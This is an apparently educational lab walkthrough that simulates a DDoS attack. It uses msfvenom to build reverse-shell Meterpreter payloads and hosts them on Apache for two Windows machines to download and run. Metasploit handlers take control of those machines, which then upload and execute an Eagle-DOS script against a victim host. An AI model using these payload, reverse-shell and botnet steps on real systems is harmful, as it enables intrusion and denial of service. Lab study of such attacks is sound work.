**Note: The content in this article is only for educational purposes and understanding of cybersecurity concepts. It should enable people and organizations to have a better grip on threats and know how to protect themselves against them. Please use this information responsibly.**
This article examines the working of Distributed Denial of Service (DDoS) attacks, focusing on the use of a botnet—a group of compromised systems an attacker controls to flood a target system with traffic. DDoS attacks happen often and can bring systems offline by using up their resources, making them unreachable for real users.
A botnet is a group of internet-linked devices, each one infected with malware that lets an attacker control them remotely. The attacker can use these hijacked devices, or “bots,” to create huge amounts of traffic, which then swamps the target. While actual DDoS attacks depend on big botnets, this guide shows a mock DDoS scenario in a controlled lab setup using Metasploit and the Eagle-DOS script.
Walkthrough
This walkthrough demonstrates how to simulate a DDoS scenario using Metasploit and Eagle-DOS.py script. The setup includes:
– One Attacker Machine: Kali Linux (192.168.118.147)
– Two Systems to compromise to create a botnet: Windows (192.168.118.137, 192.168.118.148)
– One Victim Machine: Windows target (192.168.118.146)
We can use a VMware workstation to set up the scenario.
Step 1: Set Up Reverse Shell Payloads on Kali Linux
1. Generate Payloads with msfvenom on Kali Linux machines. Use different payloads for each compromised system.
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.147 LPORT=6969 -f exe > exploit1.exe
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.147 LPORT=9999 -f exe > exploit2.exe
2. Start Apache Server
# service apache2 start
3. Copy Payloads to the root directory of the Apache web server
# cp exploit1.exe exploit2.exe /var/www/html
Step 2: Establish Reverse Shells from Compromised Machines
1. Open Metasploit and Set Up Handlers
For each compromised machine, open a new terminal and run the following commands:
# msfconsole -q -x “use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.118.147; set LPORT 6969; run”
# msfconsole -q -x “use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.118.147; set LPORT 9999; run”
2. Access Payloads on Windows Machines
On 1st Windows machine that we want to compromise (192.168.118.137), open a web browser and navigate to http://192.168.118.147/exploit1.exe to download the payload.
On 2nd Windows machine that we want to compromise (192.168.118.148), open a web browser and navigate to http://192.168.118.147/exploit2.exe to download the payload.
Run exploit1.exe on the first machine and exploit2.exe on the second.
3. Verify Meterpreter Sessions
Check that sessions have opened in Metasploit, indicating control over the compromised systems.
For Windows (192.168.118.137)
For Windows (192.168.118.148)
Step 3: Execute Eagle-dos.py Script to Botnet Machines
1. Open eagle-dos.py
# nano eagle-dos.py
2. Set the IP variable to 192.168.118.146 (target’s machine IP)
Save and exit from the editor after making the changes.
3. On each meterpreter session, write the following command to upload the script.
upload /home/kali/eagle-dos.py
2. Run the DDoS Script on Each Compromised Machine
In each meterpreter shell, execute these commands:
powershell_shell
If it shows any error, execute the command:
load powershell
After getting the PowerShell, execute the command:
.\eagle-dos.py
If you see the screen of compromised systems, it means that the script is running there, which is targeting the victim’s machine:
Step 6: Monitor and Analyze Traffic on the Target Machine
Use System Monitor or Task Manager to view CPU usage.
In this walkthrough, we successfully simulated a DDoS attack using a small botnet created with Metasploit and the Eagle-DOS script. By following a sequence of steps, we set up reverse shells to compromise two Windows machines, deployed the DDoS script on each compromised system, and launched a simulated attack against a target machine. Monitoring the target’s resource usage revealed the impact of the attack, demonstrating how a botnet can exhaust a system’s resources and potentially render it inaccessible.
Summary Points
1. Payload Generation: Created reverse shell payloads using msfvenom on the Kali Linux attacker machine.
2. File Hosting: Set up an Apache web server on Kali Linux to host payloads for easy access by compromised systems.
3. Establishing Reverse Shells: Used Metasploit to connect to the compromised Windows machines and gain control over them.
4. Deploying Eagle-DOS Script: Configured and uploaded eagle-dos.py to the compromised machines.
5. Launching the Attack: Executed the script from each compromised machine, directing traffic toward the target machine to simulate a DDoS attack.
6. Monitoring Impact: Analyzed the target machine’s CPU and resource usage to observe the effects of the simulated DDoS.
